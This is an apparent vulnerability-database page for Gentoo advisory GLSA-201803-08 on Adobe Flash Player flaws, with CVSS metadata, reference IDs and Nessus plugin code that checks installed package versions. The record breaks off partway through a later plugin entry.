GLSA-201803-08 : Adobe Flash Player: Multiple vulnerabilities (Underminer)

2018-03-19T00:00:00

Description

The remote host is affected by the vulnerability described in GLSA-201803-08 (Adobe Flash Player: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. Impact : A remote attacker could possibly execute arbitrary code with the privileges of the process or bypass security restrictions. Workaround : There is no known workaround at this time.

{"id": "GENTOO_GLSA-201803-08.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "GLSA-201803-08 : Adobe Flash Player: Multiple vulnerabilities (Underminer)", "description": "The remote host is affected by the vulnerability described in GLSA-201803-08 (Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could possibly execute arbitrary code with the privileges of the process or bypass security restrictions.\n Workaround :\n\n There is no known workaround at this time.", "published": "2018-03-19T00:00:00", "modified": "2021-11-30T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": true, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.tenable.com/plugins/nessus/108434", "reporter": "This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://security.gentoo.org/glsa/201803-08", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4871", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4877", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4919", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4920", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4878"], "cvelist": ["CVE-2018-4871", "CVE-2018-4877", "CVE-2018-4878", "CVE-2018-4919", "CVE-2018-4920"], "immutableFields": [], "lastseen": "2023-01-11T14:40:30", "viewCount": 44, "enchantments": {"dependencies": {"references": [{"type": "adobe", "idList": ["APSA18-01", "APSB18-01", "APSB18-03", "APSB18-05"]}, {"type": "attackerkb", "idList": ["AKB:41DF47B0-8F5D-477F-9F42-AB76A33252AD"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0016", "CPAI-2018-0052", "CPAI-2018-0056", "CPAI-2018-0175", "CPAI-2018-0176"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2018-4878"]}, {"type": "cve", "idList": ["CVE-2018-4871", "CVE-2018-4877", "CVE-2018-4878", "CVE-2018-4919", "CVE-2018-4920"]}, {"type": "exploitdb", "idList": ["EDB-ID:44412", "EDB-ID:44744", "EDB-ID:44745"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:3AE76F8EB91746556D3EB11E9FF64F66", "EXPLOITPACK:6891CF27FFF72B8EB68CEFB56D149FC3", "EXPLOITPACK:D16BF29892ADBD1FE8B1E6E0A3DED407"]}, {"type": "fireeye", "idList": ["FIREEYE:0D4F2E1284C786ABA6A50D8BE7E34E6E", "FIREEYE:2648D8DF405C49929956ACCF89B47ABF", "FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B", "FIREEYE:622FA05F62A3EDD3379557F635579EFB", "FIREEYE:96525D6EA5DBF734A371FB66EB02FA45", "FIREEYE:A819772457030262D1150428E2B4438C", "FIREEYE:D9B02C48E42AD3B4134C515CEB7E23C8"]}, {"type": "freebsd", "idList": ["313078E3-26E2-11E8-9920-6451062F0F7A", "756A8631-0B84-11E8-A986-6451062F0F7A", "9C016563-F582-11E7-B33C-6451062F0F7A"]}, {"type": "gentoo", "idList": ["GLSA-201803-08"]}, {"type": "kaspersky", "idList": ["KLA11171", "KLA11191"]}, {"type": "krebs", "idList": ["KREBS:E2D2D085D282D0D49FB14A33098B68DE"]}, {"type": "mageia", "idList": ["MGASA-2018-0072", "MGASA-2018-0120", "MGASA-2018-0189"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:026284ECC22DB2D1F343F9B66686DEF9", "MALWAREBYTES:06D9BFC6DC339FACFCE028EB1C5A79EF", "MALWAREBYTES:1EF2E06811A91F2948F835D21FF698ED", "MALWAREBYTES:21860B5266FF4C6017A8B388973F2911", "MALWAREBYTES:29082210E17AE80B08D8FF58AED79F23", "MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26", "MALWAREBYTES:4232991FEE4DC3F0CD04D068FBB82A1C", "MALWAREBYTES:5899EF0CF34937AFA2DB4AB02D282DF6", "MALWAREBYTES:6C5219B55CB625F7D9D16F7CD92E526C", "MALWAREBYTES:B3C57DCB817E8FCEC5860BC0C22D5A2A", "MALWAREBYTES:C8D6FFC9442802684305F89A89609938", "MALWAREBYTES:C982F670DC06D05621493C9E9A1E0E14", "MALWAREBYTES:CA0A032ADCA72FCB979CB83795FC527B", "MALWAREBYTES:CCB1B1B23474798BB372D709A6E97F86", "MALWAREBYTES:DA40246EC094218998CD2BD24735C7A6", "MALWAREBYTES:E0E596B13A84774F12BFB5962B091DCE", "MALWAREBYTES:EA93E4D6EB6BD6A0F2388E0DF2AE2D16", "MALWAREBYTES:F79B9F46F986F9BDA455EEBF8E2CA464"]}, {"type": "mscve", "idList": ["MS:ADV180001", "MS:ADV180004", "MS:ADV180006"]}, {"type": "myhack58", "idList": ["MYHACK58:62201889929", "MYHACK58:62201891130", "MYHACK58:62201994516"]}, {"type": "nessus", "idList": ["700429.PRM", "700430.PRM", "700431.PRM", "FLASH_PLAYER_APSA18-01.NASL", "FLASH_PLAYER_APSB18-01.NASL", "FLASH_PLAYER_APSB18-05.NASL", "FREEBSD_PKG_313078E326E211E899206451062F0F7A.NASL", "FREEBSD_PKG_756A86310B8411E8A9866451062F0F7A.NASL", "FREEBSD_PKG_9C016563F58211E7B33C6451062F0F7A.NASL", "MACOSX_FLASH_PLAYER_APSA18-01.NASL", "MACOSX_FLASH_PLAYER_APSB18-01.NASL", "MACOSX_FLASH_PLAYER_APSB18-05.NASL", "REDHAT-RHSA-2018-0081.NASL", "REDHAT-RHSA-2018-0285.NASL", "REDHAT-RHSA-2018-0520.NASL", "SMB_NT_MS18_FEB_4074595.NASL", "SMB_NT_MS18_JAN_4056887.NASL", "SMB_NT_MS18_MAR_4088785.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812683", "OPENVAS:1361412562310812684", "OPENVAS:1361412562310812685", "OPENVAS:1361412562310812686", "OPENVAS:1361412562310812687", "OPENVAS:1361412562310812688", "OPENVAS:1361412562310812689", "OPENVAS:1361412562310812716", "OPENVAS:1361412562310812717", "OPENVAS:1361412562310812718", "OPENVAS:1361412562310812719", "OPENVAS:1361412562310812720", "OPENVAS:1361412562310812721", "OPENVAS:1361412562310812722", "OPENVAS:1361412562310813024", "OPENVAS:1361412562310813025", "OPENVAS:1361412562310813026", "OPENVAS:1361412562310813027", "OPENVAS:1361412562310813028", "OPENVAS:1361412562310813029", "OPENVAS:1361412562310813030"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147041"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:832B33D45F45271E91CA6542BC9CFD59", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "redhat", "idList": ["RHSA-2018:0081", "RHSA-2018:0285", "RHSA-2018:0520"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-4871", "RH:CVE-2018-4877", "RH:CVE-2018-4878", "RH:CVE-2018-4919", "RH:CVE-2018-4920"]}, {"type": "securelist", "idList": ["SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "SECURELIST:F05B277B9FBC7AA810A2092CB58DEF37"]}, {"type": "seebug", "idList": ["SSV:97136"]}, {"type": "symantec", "idList": ["SMNTC-102893", "SMNTC-102930", "SMNTC-103383", "SMNTC-103385"]}, {"type": "talosblog", "idList": ["TALOSBLOG:B69F0136CDE2A78382370469FF70F7DB"]}, {"type": "thn", "idList": ["THN:3BC4F7FE3170D82B2C8328638552D1D3", "THN:ED087560040A02BCB1F68DE406A7F577"]}, {"type": "threatpost", "idList": ["THREATPOST:BC14FD8D22AC2C22C164C5B8B0E36C05", "THREATPOST:DBD7145D5FE0AE34B1D653D25DF60AE8", "THREATPOST:E1C629434DE943EAA7BD57B1F6EEA7E2", "THREATPOST:EA5D6454E04EAFE2D10FDC5BD6D23F81"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:08ADD009C78AC2B7B49C47D2673AD447", "TRENDMICROBLOG:0B24CF652B6ADAB5E1BE333A26A02E21", "TRENDMICROBLOG:611E1E590AEA0D73DBB760324065E09C", "TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034", "TRENDMICROBLOG:D07F262A5F92BE131EF59AA1DD863465"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-4877", "UB:CVE-2018-4878", "UB:CVE-2018-4919", "UB:CVE-2018-4920"]}, {"type": "zdi", "idList": ["ZDI-18-124", "ZDI-18-178"]}, {"type": "zdt", "idList": ["1337DAY-ID-30119", "1337DAY-ID-30431", "1337DAY-ID-30432"]}]}, "score": {"value": 1.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "adobe", "idList": ["APSA18-01", "APSB18-01", "APSB18-03", "APSB18-05"]}, {"type": "attackerkb", "idList": ["AKB:41DF47B0-8F5D-477F-9F42-AB76A33252AD"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0016", "CPAI-2018-0052", "CPAI-2018-0056", "CPAI-2018-0175", "CPAI-2018-0176"]}, {"type": "cve", "idList": ["CVE-2018-4871", "CVE-2018-4877", "CVE-2018-4878", "CVE-2018-4919", "CVE-2018-4920"]}, {"type": "exploitdb", "idList": ["EDB-ID:44412", "EDB-ID:44744", "EDB-ID:44745"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:D16BF29892ADBD1FE8B1E6E0A3DED407"]}, {"type": "fireeye", "idList": ["FIREEYE:0D4F2E1284C786ABA6A50D8BE7E34E6E", "FIREEYE:96525D6EA5DBF734A371FB66EB02FA45"]}, {"type": "freebsd", "idList": ["756A8631-0B84-11E8-A986-6451062F0F7A", "9C016563-F582-11E7-B33C-6451062F0F7A"]}, {"type": "gentoo", "idList": ["GLSA-201803-08"]}, {"type": "kaspersky", "idList": ["KLA11171", "KLA11191"]}, {"type": "krebs", "idList": ["KREBS:E2D2D085D282D0D49FB14A33098B68DE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4232991FEE4DC3F0CD04D068FBB82A1C"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/FLASH_PLAYER-CVE-2018-4919/"]}, {"type": "mscve", "idList": ["MS:ADV180001", "MS:ADV180004", "MS:ADV180006"]}, {"type": "myhack58", "idList": ["MYHACK58:62201889929"]}, {"type": "nessus", "idList": ["FLASH_PLAYER_APSA18-01.NASL", "FLASH_PLAYER_APSB18-01.NASL", "FREEBSD_PKG_756A86310B8411E8A9866451062F0F7A.NASL", "FREEBSD_PKG_9C016563F58211E7B33C6451062F0F7A.NASL", "REDHAT-RHSA-2018-0081.NASL", "REDHAT-RHSA-2018-0285.NASL", "REDHAT-RHSA-2018-0520.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812683", "OPENVAS:1361412562310812684", "OPENVAS:1361412562310812685", "OPENVAS:1361412562310812686", "OPENVAS:1361412562310812687", "OPENVAS:1361412562310812688", "OPENVAS:1361412562310812689", "OPENVAS:1361412562310812716", "OPENVAS:1361412562310812717", "OPENVAS:1361412562310812718", "OPENVAS:1361412562310812719", "OPENVAS:1361412562310812720", "OPENVAS:1361412562310812721", "OPENVAS:1361412562310812722"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147041"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:832B33D45F45271E91CA6542BC9CFD59"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-4871", "RH:CVE-2018-4877", "RH:CVE-2018-4878", "RH:CVE-2018-4919", "RH:CVE-2018-4920"]}, {"type": "securelist", "idList": ["SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E"]}, {"type": "seebug", "idList": ["SSV:97136"]}, {"type": "symantec", "idList": ["SMNTC-103385"]}, {"type": "talosblog", "idList": ["TALOSBLOG:B69F0136CDE2A78382370469FF70F7DB"]}, {"type": "thn", "idList": ["THN:3BC4F7FE3170D82B2C8328638552D1D3", "THN:ED087560040A02BCB1F68DE406A7F577"]}, {"type": "threatpost", "idList": ["THREATPOST:BC14FD8D22AC2C22C164C5B8B0E36C05", "THREATPOST:DBD7145D5FE0AE34B1D653D25DF60AE8", "THREATPOST:E1C629434DE943EAA7BD57B1F6EEA7E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:08ADD009C78AC2B7B49C47D2673AD447", "TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034", "TRENDMICROBLOG:D07F262A5F92BE131EF59AA1DD863465"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-4877", "UB:CVE-2018-4878", "UB:CVE-2018-4919", "UB:CVE-2018-4920"]}, {"type": "zdi", "idList": ["ZDI-18-124"]}, {"type": "zdt", "idList": ["1337DAY-ID-30119", "1337DAY-ID-30431", "1337DAY-ID-30432"]}]}, "exploitation": null, "vulnersScore": 1.1}, "_state": {"dependencies": 1673452425, "score": 1673453879}, "_internal": {"score_hash": "ab78b34ce9f0a8468b549198edde951d"}, "pluginID": "108434", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201803-08.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108434);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-4871\", \"CVE-2018-4877\", \"CVE-2018-4878\", \"CVE-2018-4919\", \"CVE-2018-4920\");\n script_xref(name:\"GLSA\", value:\"201803-08\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"GLSA-201803-08 : Adobe Flash Player: Multiple vulnerabilities (Underminer)\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201803-08\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201803-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Adobe Flash Player users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-plugins/adobe-flash-29.0.0.113'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:adobe-flash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/19\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-plugins/adobe-flash\", unaffected:make_list(\"ge 29.0.0.113\"), vulnerable:make_list(\"lt 29.0.0.113\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Flash Player\");\n}\n", "naslFamily": "Gentoo Local Security Checks", "cpe": ["p-cpe:/a:gentoo:linux:adobe-flash", "cpe:/o:gentoo:linux"], "solution": "All Adobe Flash Player users should upgrade to the latest version:\n # emerge --sync # emerge --ask --oneshot --verbose '>=www-plugins/adobe-flash-29.0.0.113'", "nessusSeverity": "Critical", "cvssScoreSource": "", "vendor_cvss2": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "vendor_cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "vpr": {"risk factor": "Critical", "score": "9.8"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2018-03-19T00:00:00", "vulnerabilityPublicationDate": null, "exploitableWith": []}

{"gentoo": [{"lastseen": "2022-01-17T19:04:30", "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process or bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-plugins/adobe-flash-29.0.0.113\"", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-19T00:00:00", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4871", "CVE-2018-4877", "CVE-2018-4878", "CVE-2018-4919", "CVE-2018-4920"], "modified": "2018-03-19T00:00:00", "id": "GLSA-201803-08", "href": "https://security.gentoo.org/glsa/201803-08", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-11T14:49:48", "description": "Versions of Adobe Flash Player prior to 29.0.0.113 are unpatched, and therefore affected by multiple use-after-free vulnerabilities that allow arbitrary code execution. (CVE-2018-4919, CVE-2018-4920)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-03-20T00:00:00", "type": "nessus", "title": "Flash Player < 29.0.0.113 Multiple RCE (APSB18-05)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4919", "CVE-2018-4920"], "modified": "2019-04-09T00:00:00", "cpe": ["cpe:2.3:a:adobe:flash_player:*:*:*:*:*:*:*:*"], "id": "700431.PRM", "href": "https://www.tenable.com/plugins/nnm/700431", "sourceData": "Binary data 700431.prm", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:40:47", "description": "The version of Adobe Flash Player installed on the remote macOS or Mac OS X host is equal or prior to version 28.0.0.161.\nIt is therefore affected by multiple vulnerabilities.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-03-13T00:00:00", "type": "nessus", "title": "Adobe Flash Player for Mac <= 28.0.0.161 (APSB18-05)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4919", "CVE-2018-4920"], "modified": "2019-11-08T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_APSB18-05.NASL", "href": "https://www.tenable.com/plugins/nessus/108283", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108283);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2018-4919\", \"CVE-2018-4920\");\n\n script_name(english:\"Adobe Flash Player for Mac <= 28.0.0.161 (APSB18-05)\");\n script_summary(english:\"Checks the version of the ActiveX control.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote macOS or Mac OSX host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote macOS or Mac\nOS X host is equal or prior to version 28.0.0.161.\nIt is therefore affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-05.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 29.0.0.113 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4920\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\ncutoff_version = \"28.0.0.161\";\nfix = \"29.0.0.113\";\n# We're checking for versions less than or equal to the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:43:16", "description": "The remote Windows host is missing security update KB4088785. It is, therefore, affected by multiple remote code execution vulnerabilities in Adobe Flash Player.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-03-13T00:00:00", "type": "nessus", "title": "KB4088785: Security update for Adobe Flash Player (March 2018)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4919", "CVE-2018-4920"], "modified": "2019-11-08T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "SMB_NT_MS18_MAR_4088785.NASL", 